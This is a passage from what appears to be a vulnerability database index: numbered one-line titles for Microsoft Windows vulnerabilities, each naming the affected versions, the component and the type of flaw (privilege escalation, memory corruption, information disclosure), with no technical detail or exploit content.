Connected User Experiences/Telemetry Service privilege escalation [153229] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153228] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153227] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153225] Microsoft Windows up to Server 2019 Scheduled Task privilege escalation [153224] Microsoft OneDrive on Windows privilege escalation [153223] Microsoft Windows up to Server 2019 WpcDesktopMonSvc privilege escalation [153214] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153213] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153212] Microsoft Windows up to Server 2019 Kernel privilege escalation [153207] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153206] Microsoft Windows up to Server 2019 DirectX privilege escalation [153204] Microsoft Windows up to Server 2019 information disclosure [153203] Microsoft Windows up to Server 2019 privilege escalation [153200] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153198] Microsoft Windows up to Server 2019 Win32k memory corruption [153197] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [153196] Microsoft Windows up to Server 2019 Win32k memory corruption [153195] Microsoft Windows up to Server 2019 DirectX privilege escalation [153190] Microsoft Windows up to Server 2019 Codecs Library memory corruption [153189] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153188] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153187] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153185] Microsoft Windows up to Server 2019 Hyper-V memory corruption [153181] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153180] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153176] Microsoft Windows up to Server 2019 Graphics Component memory corruption [153175] Microsoft Windows up to Server 2019 Graphics memory corruption [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [151174] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151170] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151169] Microsoft Windows up to Server 2019 Hardlink privilege escalation [151164] Microsoft Windows up to Server 2019 Win32k privilege escalation [151163] Microsoft Windows up to Server 2019 Graphics Component information disclosure [151161] Microsoft Windows up to Server 2019 GDI information disclosure [151160] Microsoft Windows up to Server 2019 GDI information disclosure [151158] Microsoft Windows up to Server 2019 Win32k privilege escalation [151157] Microsoft Windows up to Server 2019 Win32k information disclosure [151156] Microsoft Windows up to Server 2019 GDI information disclosure [151154] Microsoft Windows up to Server 2019 Network Connections Service information disclosure [151153] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151152] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151151] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151150] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151149] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151148] Microsoft Windows Connected User Experiences/Telemetry Service information disclosure [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151145] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [151141] Microsoft Windows up to Server 2019 Imaging information disclosure [151139] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [151138] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151136] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151135] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151132] Microsoft Windows up to Server 2019 Media Foundation information disclosure [151129] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151127] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [151113] Microsoft Windows up to Server 2019 Win32k privilege escalation [151112] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [151110] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [151109] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151108] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151106] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151104] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151103] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [151102] Microsoft Windows up to Server 2019 Error Reporting information disclosure [151101] Microsoft Windows up to Server 2019 GDI information disclosure [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151099] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [151098] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151096] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151095] Microsoft Windows up to Server 2019 Defender privilege escalation [151094] Microsoft Windows up to Server 1909 Defender privilege escalation [151091] Microsoft Windows up to Server 2019 DirectX privilege escalation [151078] Microsoft Windows up to Server 2019 GDI+ memory corruption [151077] Microsoft Windows up to Server 2019 GDI+ memory corruption [151064] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151063] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151062] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151061] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151060] Microsoft Windows up to Server 2019 lnk File privilege escalation [149967] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149966] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149963] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149962] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Hyper-V privilege escalation [149961] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149960] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149959] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149958] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149957] Microsoft Windows up to Server 2019 Graphics Component information disclosure [149956] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149955] Microsoft Windows up to Server 2019 GDI memory corruption [149954] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149953] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149952] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149951] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149950] Microsoft Windows up to Server 2019 privilege escalation [149949] Microsoft Windows up to Server 2019 tapisrv.dll privilege escalation [149948] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [149947] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149944] Microsoft Windows up to Server 2019 Win32k privilege escalation [149943] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149942] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [149941] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [149940] Microsoft Windows up to Server 2019 Win32k privilege escalation [149939] Microsoft Windows up to Server 2019 Win32k privilege escalation [149938] Microsoft Windows up to Server 2019 Win32k privilege escalation [149937] Microsoft Windows up to Server 2019 Win32k privilege escalation [149936] Microsoft Windows up to Server 2019 Win32k privilege escalation [149935] Microsoft Windows up to Server 2019 Win32k privilege escalation [149934] Microsoft Windows up to Server 2019 Win32k privilege escalation [149933] Microsoft Windows up to Server 2019 Win32k privilege escalation [149932] Microsoft Windows up to Server 2019 Win32k information disclosure [149931] Microsoft Windows up to Server 2016 Win32k information disclosure [149930] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149929] Microsoft Windows up to Server 2019 DirectX information disclosure [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149927] Microsoft Windows up to Server 2019 Imaging Library memory corruption [149926] Microsoft Windows up to Server 2019 IME privilege escalation [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149922] Microsoft Windows up to Server 2019 Wireless Network Manager privilege escalation [149921] Microsoft Windows up to Server 2019 Backup Service privilege escalation [149920] Microsoft Windows up to Server 2019 Client License Service privilege escalation [149919] Microsoft Windows up to Server 2019 Telephony Service information disclosure [149913] Microsoft Windows up to Server 2019 Win32k privilege escalation [149910] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [149909] Microsoft Windows up to Server 2019 COM Server privilege escalation [149907] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149906] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149905] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149904] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [149903] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149902] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149901] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149900] Microsoft Windows up to Server 2019 Kernel privilege escalation [149899] Microsoft Windows up to Server 2019 Kernel privilege escalation [149898] Microsoft Windows up to Server 2019 Kernel privilege escalation [149897] Microsoft Windows up to Server 2019 Kernel privilege escalation [149896] Microsoft Windows up to Server 2019 Kernel privilege escalation [149895] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149894] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [149891] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [149890] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [149889] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149888] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [149887] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [149886] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [149884] Microsoft Windows up to Server 2019 Media Foundation memory corruption [149883] Microsoft Windows up to Server 2019 LNK privilege escalation [149882] Microsoft Windows up to Server 2019 memory corruption [149881] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149880] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149312] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148654] Microsoft Windows up to Server 2019 Memory Section privilege escalation [148653] Microsoft Windows up to Server 2019 Win32k privilege escalation [148652] Microsoft Windows up to Server 2019 Media Service privilege escalation [148651] Microsoft Windows up to Server 2019 Update Notification Manager privilege escalation [148650] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Subsystem for Linux privilege escalation [148649] Microsoft Windows up to Server 2019 Symbolic Link privilege escalation [148648] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [148638] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Win32k privilege escalation [148637] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [148634] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [148631] Microsoft Windows Server 2016/Server 2019 Remote Desktop Gateway privilege escalation [148629] Microsoft Windows up to Server 2019 Hard Link privilege escalation [148627] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [148626] Microsoft Windows Remote Desktop Gateway privilege escalation [148625] Microsoft Windows Remote Desktop Gateway privilege escalation [148614] Microsoft Windows up to Server 2019 GDI+ information disclosure [148613] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148612] Microsoft Windows Remote Desktop Credentials information disclosure [148611] Microsoft Windows up to Server 2016 Graphics Component information disclosure [148610] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148609] Microsoft Windows up to Server 2019 Win32k information disclosure [148608] Microsoft Windows up to Server 2019 Graphics Component information disclosure [148607] Microsoft Windows up to Server 2019 CryptoAPI Crypt32.dll weak authentication [146926] Microsoft Windows XP SP3 Remote Desktop Protocol information disclosure [146924] Microsoft Windows up to Server 2019 Defender memory corruption [146879] Microsoft Windows up to Server 2019 OLE privilege escalation [146878] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [146877] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146876] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146875] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 COM Server privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [146873] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [146872] Microsoft Windows up to Server 2019 Kernel information disclosure [146871] Microsoft Windows up to Server 2019 Kernel information disclosure [146870] Microsoft Windows up to Server 2019 Hyper-V information disclosure [146869] Microsoft Windows up to Server 2019 GDI information disclosure [146868] Microsoft Windows up to Server 2019 GDI information disclosure [146867] Microsoft Windows up to Server 2019 GDI information disclosure [146862] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [146858] Microsoft Windows up to Server 2019 Win32k information disclosure [146857] Microsoft Windows up to Server 2016 Win32k privilege escalation [146855] Microsoft Windows up to Server 2019 Win32k Graphics privilege escalation [146804] Microsoft Windows Media Center XML External Entity [145412] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145402] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145394] Microsoft Windows up to Server 2019 Win32k information disclosure [145393] Microsoft Windows up to Server 2019 GDI information disclosure [145390] Microsoft Windows up to Server 2019 Win32k information disclosure [145388] Microsoft Windows up to Server 2012 R2 Win32k privilege escalation [145386] Microsoft Windows up to Server 2012 R2 DirectWrite information disclosure [145384] Microsoft Windows up to Server 2019 NetLogon Security Feature privilege escalation [145382] Microsoft Windows up to Server 2019 iphlpsvc.dll privilege escalation [145380] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [145379] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145377] Microsoft Windows up to Server 2019 Installer privilege escalation [145375] Microsoft Windows up to Server 2012 R2 OpenType Font Driver ATMFD.dll information disclosure [145374] Microsoft Windows up to Server 2019 DirectWrite information disclosure [145373] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [145372] Microsoft Windows up to Server 2019 Win32k privilege escalation [145370] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [145367] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145366] Microsoft Windows up to Server 2019 Win32k privilege escalation [145365] Microsoft Windows up to Server 2019 Win32k privilege escalation [145364] Microsoft Windows up to Server 2019 Win32k privilege escalation [145363] Microsoft Windows up to Server 2019 Win32k privilege escalation [145362] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Kernel privilege escalation [145361] Microsoft Windows up to Server 2019 privilege escalation [145360] Microsoft Windows up to Server 2019 Certificate Dialog privilege escalation [145359] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [145358] Microsoft Windows up to Server 2019 Netlogon privilege escalation [145357] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [145355] Microsoft Windows up to Server 2019 Servicing Stack information disclosure [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145352] Microsoft Windows up to Server 2019 Error Reporting information disclosure [145350] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [145349] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145348] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145346] Microsoft Windows up to Server 2019 Kernel information disclosure [145345] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145344] Microsoft Windows up to Server 2019 privilege escalation [145342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k Graphics memory corruption [145341] Microsoft Windows 10 1903/Server 1903 Media Foundation memory corruption [145340] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145334] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145333] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145332] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [145331] Microsoft Windows up to Server 2019 Hyper-V Switch privilege escalation [143118] Microsoft Windows up to Server 2019 IIS memory corruption [143116] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI information disclosure [143115] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [143114] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [143113] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143112] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143103] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [143102] Microsoft Windows up to Server 2019 Power Service umpo.dll privilege escalation [143101] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [143100] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143099] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 NTLMv2 weak encryption [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143096] Microsoft Windows up to Server 2019 Kernel information disclosure [143090] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [143089] Microsoft Windows up to Server 2019 rdbss.sys memory corruption [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143084] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143083] Microsoft Windows up to Server 2019 TLS information disclosure [143082] Microsoft Windows up to Server 2019 Hardlink privilege escalation [143081] Microsoft Windows up to Server 2019 Setup privilege escalation [143080] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143077] Microsoft Windows up to Server 2019 Imaging API memory corruption [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [143075] Microsoft Windows up to Server 2019 NTLM MIC weak authentication [143071] Microsoft Windows up to Server 2019 MS XML XML External Entity [143063] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [142140] Microsoft Windows Defender File privilege escalation [141652] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [141637] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141631] Microsoft Windows up to Server 2019 SMB Client Driver information disclosure [141630] Microsoft Windows up to Server 2019 memory corruption [141629] Microsoft Windows up to Server 2019 Update Delivery Optimization privilege escalation [141627] Microsoft Windows up to Server 2019 GDI information disclosure [141626] Microsoft Windows up to Server 2019 Win32k privilege escalation [141625] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 DirectX memory corruption [141624] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [141621] Microsoft Windows up to Server 2019 Kernel information disclosure [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [141619] Microsoft Windows up to Server 2019 ALPC privilege escalation [141618] Microsoft Windows up to Server 2019 hdAudio.sys privilege escalation [141617] Microsoft Windows up to Server 2019 Store Installer privilege escalation [141616] Microsoft Windows up to Server 2019 ALPC privilege escalation [141615] Microsoft Windows up to Server 2019 Winlogon privilege escalation [141614] Microsoft Windows up to Server 2019 Compatibility Appraiser privilege escalation [141606] Microsoft Windows up to Server 2019 Win32k privilege escalation [141605] Microsoft Windows up to Server 2019 Hyper-V information disclosure [141604] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141603] Microsoft Windows up to Server 2019 GDI information disclosure [141602] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141601] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141600] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141599] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141598] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141597] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141596] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141595] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141594] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141593] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141592] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141591] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141590] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [141581] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [141580] Microsoft Windows up to Server 2019 Transaction Manager information disclosure [141579] Microsoft Windows up to Server 2016 DirectX information disclosure [141577] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [141575] Microsoft Windows up to Server 2019 lnk File privilege escalation [141563] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141562] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141561] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141560] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [139972] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139971] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139970] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139969] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139968] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139966] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [139965] Microsoft Windows up to Server 2019 Kernel information disclosure [139964] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139963] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139962] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [139960] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139958] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139955] Microsoft Windows up to Server 2019 SyncController.dll privilege escalation [139949] Microsoft Windows up to Server 2019 XmlLite Runtime XmlLite.dll XML External Entity [139941] Microsoft Windows up to Server 2019 DirectX privilege escalation [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [139936] Microsoft Windows up to Server 2019 SymCrypt information disclosure [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139934] Microsoft Windows 7 SP1/Server 2018 R2 SP1/Server 2018 SP2 Win32k privilege escalation [139933] Microsoft Windows up to Server 2019 p2pimsvc privilege escalation [139932] Microsoft Windows up to Server 2019 Kernel privilege escalation [139931] Microsoft Windows up to Server 2019 File Signature Security Feature 7PK Security Features [139930] Microsoft Windows up to Server 2019 ALPC privilege escalation [139928] Microsoft Windows up to Server 2019 Kernel privilege escalation [139927] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139926] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139925] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139924] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139923] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Graphics Component information disclosure [139922] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139921] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139920] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139919] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139918] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139917] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139916] Microsoft Windows up to Server 2019 XML Core Services MSXML Parser XML External Entity [139914] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139913] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [139911] Microsoft Windows up to Server 2019 memory corruption [139910] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139909] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139908] Microsoft Windows up to Server 2019 Bluetooth weak encryption [139907] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139906] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139905] Microsoft Windows Server 2008 SP2 DHCP Server memory corruption [139895] Microsoft Windows up to Server 2019 lnk File privilege escalation [139894] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [139893] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139892] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139891] Microsoft Windows up to Server 2019 Font Library privilege escalation [139890] Microsoft Windows up to Server 2019 Font Library privilege escalation [139889] Microsoft Windows up to Server 2019 Font Library privilege escalation [139888] Microsoft Windows up to Server 2019 Font Library privilege escalation [139887] Microsoft Windows up to Server 2019 Font Library privilege escalation [139886] Microsoft Windows up to Server 2019 Font Library privilege escalation [139880] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [139879] Microsoft Windows up to Server 2019 DHCP Client memory corruption [139878] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139876] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139875] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139527] Microsoft Windows PowerShell privilege escalation [137586] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137585] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137584] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137583] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137582] Microsoft Windows ADFS Security Feature 7PK Security Features [137581] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137580] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137579] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137578] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137577] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137576] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137575] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137574] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137573] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137568] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [137567] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137566] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137565] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137564] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137563] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137562] Microsoft Windows up to Server 2019 Win32k information disclosure [137561] Microsoft Windows up to Server 2019 GDI information disclosure [137560] Microsoft Windows up to Server 2019 GDI information disclosure [137559] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137555] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137554] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137553] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137549] Microsoft Windows up to Server 2016 DLL privilege escalation [137544] Microsoft Windows up to Server 2019 Kernel information disclosure [137541] Microsoft Windows up to Server 2019 privilege escalation [137540] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [137539] Microsoft Windows up to Server 2016 DirectX privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [137537] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [137535] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [137533] Microsoft Windows up to Server 2019 SymCrypt privilege escalation [137532] Microsoft Windows DNS Server Data Processing Error [137527] Microsoft Windows up to Server 2019 GDI+ memory corruption [137512] Microsoft Windows up to Server 2019 DHCP memory corruption [136349] Microsoft Windows up to Server 2019 Event Viewer eventvwr.msc information disclosure [136348] Microsoft Windows up to Server 2019 Task Scheduler privilege escalation [136347] Microsoft Windows up to Server 2019 AppXSVC privilege escalation [136345] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [136344] Microsoft Windows up to Server 2019 GDI information disclosure [136343] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136341] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136340] Microsoft Windows up to Server 2019 GDI information disclosure [136337] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [136336] Microsoft Windows up to Server 2019 Kernel privilege escalation [136335] Microsoft Windows up to Server 2019 NTLM 7PK Security Features [136334] Microsoft Windows up to Server 2019 Kernel information disclosure [136326] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136325] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136324] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136323] Microsoft Windows up to Server 2019 memory corruption [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136320] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136319] Microsoft Windows up to Server 2019 Security Credentials 7PK Security Features [136318] Microsoft Windows up to Server 2019 DirectX privilege escalation [136317] Microsoft Windows up to Server 2019 Win32k privilege escalation [136316] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136315] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136314] Microsoft Windows up to Server 2019 Win32k privilege escalation [136313] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136312] Microsoft Windows up to Server 2019 GDI information disclosure [136311] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136310] Microsoft Windows up to Server 2019 GDI information disclosure [136309] Microsoft Windows 7 